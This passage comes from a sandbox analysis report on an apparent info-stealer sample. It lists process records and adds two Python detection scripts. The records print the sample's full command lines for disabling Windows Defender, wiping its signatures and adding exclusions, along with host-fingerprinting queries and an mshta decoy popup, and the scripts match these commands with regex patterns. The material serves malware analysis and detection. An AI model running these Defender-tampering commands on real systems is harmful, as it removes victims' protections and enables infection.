                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true
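
The command lines recorded for Target IDs 8, 9 and 11 above are the whole Defender-tampering chain of this sample: an exclusion for the dropped binary, a bulk Set-MpPreference that switches off real-time monitoring, IOAV, script scanning and cloud reporting, MpCmdRun.exe -RemoveDefinitions to wipe signatures, and an mshta inline-JavaScript decoy. The following is an added triage example written for this page, not Joe Sandbox's detection logic, a Sigma rule, or code from the sample: it strips the cmd.exe /c wrapper, splits the chain on the &&/& operators that cmd.exe honours outside quotes, and runs a small rule set over each sub-command so that a chain which both disables features and removes signatures produces two separate findings. The rule names, regexes and tactic labels are this editor's assumptions; the command lines in REPORT_PROCESSES are copied from the process records above and used here as constructed test input.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Command lines copied from the process records above (Target IDs 8, 9, 10, 11, 13).
# Constructed test input for this example, not a report export.
REPORT_PROCESSES: dict[int, str] = {
    8: r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"''',
    9: r'''C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"''',
    10: r'''C:\Windows\system32\conhost.exe 0xffffffff -ForceV1''',
    11: r'''C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""''',
    13: r'''C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"''',
}


@dataclass(frozen=True)
class Rule:
    name: str
    tactic: str          # coarse label for the output; editor's wording
    pattern: re.Pattern


# Hypothetical rule set for this example (editor's names and regexes, not Sigma rules).
RULES: list[Rule] = [
    Rule("defender_exclusion_added", "defense evasion",
         re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)", re.I | re.S)),
    Rule("defender_feature_disabled", "defense evasion",
         re.compile(r"Set-MpPreference\b.*?("
                    r"-Disable\w+\s+\$true"
                    r"|-EnableControlledFolderAccess\s+Disabled"
                    r"|-MAPSReporting\s+Disabled"
                    r"|-SubmitSamplesConsent\s+(NeverSend|2)\b)", re.I | re.S)),
    Rule("defender_signatures_removed", "defense evasion",
         re.compile(r"MpCmdRun\.exe.*?-RemoveDefinitions", re.I | re.S)),
    Rule("mshta_inline_script", "execution",
         re.compile(r"\bmshta(\.exe)?\s+\"?(javascript|vbscript):", re.I)),
    Rule("process_discovery", "discovery",
         re.compile(r"\btasklist\b", re.I)),
]

# cmd.exe /c "..." or /k "..."; the inner command is what actually runs.
_CMD_WRAPPER = re.compile(
    r'^\s*"?[^"\s]*cmd(?:\.exe)?"?\s+/[ck]\s+"?(?P<inner>.*?)"?\s*$', re.I | re.S)


def strip_cmd_wrapper(cmdline: str) -> str:
    """Return the command cmd.exe /c runs; other command lines pass through unchanged."""
    m = _CMD_WRAPPER.match(cmdline)
    return m.group("inner") if m else cmdline


def split_chain(command: str) -> list[str]:
    """Split a cmd.exe chain on &&, ||, & and | that sit outside double quotes.

    Small on purpose: ^ escapes and ( ) blocks are ignored, which is enough for the
    sandbox command lines above but is not a complete cmd.exe parser.
    """
    parts: list[str] = []
    buf: list[str] = []
    in_quotes = False
    i = 0
    while i < len(command):
        ch = command[i]
        if ch == '"':
            in_quotes = not in_quotes
            buf.append(ch)
        elif not in_quotes and ch in "&|":
            parts.append("".join(buf))
            buf = []
            if i + 1 < len(command) and command[i + 1] == ch:  # && or ||
                i += 1
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def triage(cmdline: str) -> dict[str, list[str]]:
    """Map rule name -> the sub-commands of one process command line that matched it."""
    findings: dict[str, list[str]] = {}
    for sub in split_chain(strip_cmd_wrapper(cmdline)):
        for rule in RULES:
            if rule.pattern.search(sub):
                findings.setdefault(rule.name, []).append(sub)
    return findings


def tactics(findings: dict[str, list[str]]) -> list[str]:
    """Distinct tactic labels behind a set of findings, sorted for stable output."""
    by_name = {r.name: r.tactic for r in RULES}
    return sorted({by_name[n] for n in findings})


def triage_report(processes: dict[int, str]) -> dict[int, dict[str, list[str]]]:
    """Keep only the processes (by Target ID) that triggered at least one rule."""
    return {tid: f for tid, f in ((t, triage(c)) for t, c in processes.items()) if f}


if __name__ == "__main__":
    for target_id, findings in sorted(triage_report(REPORT_PROCESSES).items()):
        print(f"Target ID {target_id}: {', '.join(tactics(findings))}")
        for name, subs in findings.items():
            for sub in subs:
                print(f"  [{name}] {sub[:90]}")
```

Two points the split makes visible. The chain in Target ID 9 joins the first two PowerShell invocations with && but the MpCmdRun.exe call with a single &, so the signature wipe is attempted even when Set-MpPreference fails; and the second invocation only repeats the first one's -SubmitSamplesConsent NeverSend with its numeric form (2). On a host with Tamper Protection enabled, Defender rejects most of these changes, so the command line itself, not the resulting Defender state, is the reliable detection signal; the Sigma hits listed in the report header (Powershell Defender Disable Scan Feature, Powershell Base64 Encoded MpPreference Cmdlet) key on the same tokens.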

Target ID:12
Start time:01:19:11
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:01:19:11
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:01:19:11
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:01:19:11
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff703620000
                                                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c6d10000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

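The process table above is a compact record of the sample's defensive-evasion and host-fingerprinting steps: a Defender exclusion for its own path (Add-MpPreference), a second PowerShell call that switches off real-time monitoring, IOAV, script scanning and cloud reporting (Set-MpPreference), a hardware UUID query (wmic csproduct get uuid), a display-adapter registry query, a tasklist run and an mshta popup. The following Python is an added triage example, not Joe Sandbox output and not code from the Blank Grabber project: it splits process-creation command lines, decodes a PowerShell -EncodedCommand argument when one is present (the report flags an encoded MpPreference cmdlet elsewhere; the encoded event here is constructed), and tags the behaviours visible in this table. The event tuples, tag names and the weakening-value table are this example's own assumptions.

```python
"""Triage Windows process-creation command lines for the Defender tampering
and host-fingerprinting behaviour listed in the sandbox process table.
Added example; the event list below is constructed from the report's
command lines plus one synthetic -EncodedCommand event."""
import base64
import re
from shlex import shlex

# Set-MpPreference parameters and the values that weaken Defender
# (the same set the sample's second PowerShell call uses).
DEFENDER_WEAKENING = {
    "-disablerealtimemonitoring": {"$true", "1"},
    "-disableioavprotection": {"$true", "1"},
    "-disablescriptscanning": {"$true", "1"},
    "-disableintrusionpreventionsystem": {"$true", "1"},
    "-enablecontrolledfolderaccess": {"disabled"},
    "-enablenetworkprotection": {"disabled", "auditmode"},
    "-mapsreporting": {"disabled"},
    "-submitsamplesconsent": {"neversend"},
}
EXCLUSION_PARAMS = {"-exclusionpath", "-exclusionprocess", "-exclusionextension"}

# Host-fingerprinting and lure commands seen in the process table.
FINGERPRINT_PATTERNS = [
    (re.compile(r"\bwmic\b.*\bcsproduct\b.*\buuid\b", re.I), "host_uuid_query"),
    (re.compile(r"\breg\s+query\b.*4D36E968-E325-11CE-BFC1-08002BE10318.*DriverDesc", re.I),
     "display_adapter_query"),
    (re.compile(r"\btasklist\b", re.I), "process_enumeration"),
    (re.compile(r"\bmshta(\.exe)?\b\s+\"?(javascript|vbscript):", re.I), "mshta_inline_script"),
]


def split_args(cmd):
    """Split a Windows command line on whitespace, honouring quotes but keeping
    backslashes literal (shlex's POSIX escaping would eat path separators)."""
    lexer = shlex(cmd, posix=True)
    lexer.whitespace_split = True
    lexer.escape = ""
    lexer.commenters = ""
    try:
        return list(lexer)
    except ValueError:          # unbalanced quote: fall back to a plain split
        return cmd.split()


def decode_encoded_command(args):
    """Return the script behind a powershell -EncodedCommand (-e/-ec/-enc...)
    argument as text, or None if there is none or it does not decode."""
    for i, tok in enumerate(args[:-1]):
        t = tok.lower()
        if t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t)):
            try:
                return base64.b64decode(args[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(cmd, _depth=0):
    """Return the list of behaviour tags for one command line."""
    findings = []
    args = split_args(cmd)
    lowered = [a.lower() for a in args]
    if any(a in ("powershell", "powershell.exe") or a.endswith("\\powershell.exe") for a in lowered):
        decoded = decode_encoded_command(args)
        if decoded is not None and _depth < 2:   # recurse once into the decoded script
            findings.append("powershell_encoded_command")
            findings.extend(classify(decoded, _depth + 1))
    if "add-mppreference" in lowered:
        for i, a in enumerate(lowered):
            if a in EXCLUSION_PARAMS and i + 1 < len(args):
                findings.append(f"defender_exclusion:{a[1:]}={args[i + 1]}")
    if "set-mppreference" in lowered:
        for i, a in enumerate(lowered):
            if a in DEFENDER_WEAKENING and i + 1 < len(lowered) and lowered[i + 1] in DEFENDER_WEAKENING[a]:
                findings.append(f"defender_weakened:{a[1:]}={lowered[i + 1]}")
    for pattern, tag in FINGERPRINT_PATTERNS:
        if pattern.search(cmd):
            findings.append(tag)
    return findings


def triage(events):
    """Return (image, findings) for every event that produced at least one tag."""
    flagged = []
    for image, cmd in events:
        findings = classify(cmd)
        if findings:
            flagged.append((image, findings))
    return flagged


# Constructed sample: the report's command lines plus one synthetic encoded call.
ENCODED = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("cmd.exe", r'C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"'),
    ("powershell.exe", r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"),
    ("mshta.exe", r'''mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"'''),
    ("powershell.exe", "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true "
     "-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
     "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"),
    ("tasklist.exe", "tasklist /FO LIST"),
    ("cmd.exe", r'C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"'),
    ("powershell.exe", f"powershell -enc {ENCODED}"),   # constructed, not from the report
]

if __name__ == "__main__":
    for image, findings in triage(SAMPLE_EVENTS):
        print(image, findings)
```

Run as a script it prints one line per flagged event; the conhost entries stay silent because they carry no tagged behaviour. The encoded-command branch matters in practice because the same Set-MpPreference call arrives Base64-encoded in other samples of this family, so a string match on the raw command line alone would miss it.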
                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                  Start time:01:19:14
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                  Start time:01:19:14
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff605d00000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff605d00000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff7c2f70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:01:19:20
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:0x7ff7a7b90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:01:19:20
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
